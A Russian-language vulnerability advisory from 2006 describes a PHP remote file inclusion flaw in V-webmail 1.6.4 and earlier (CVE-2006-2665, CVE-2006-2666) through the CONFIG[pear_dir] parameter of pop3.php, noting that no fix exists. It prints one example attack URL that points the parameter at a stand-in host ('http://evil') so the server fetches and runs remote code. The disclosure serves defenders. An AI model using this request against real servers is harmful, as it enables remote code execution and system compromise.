PHP-инклюдинг в V-webmail

Дата публикации:
02.06.2006
Всего просмотров:
1807
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2665
CVE-2006-2666
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
V-webmail 1.x
Уязвимые версии: V-webmail 1.6.4 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CONFIG[pear_dir]" в сценарии "includes/mailaccess/pop3.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

URL производителя: www.v-webmail.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability

или введите имя

CAPTCHA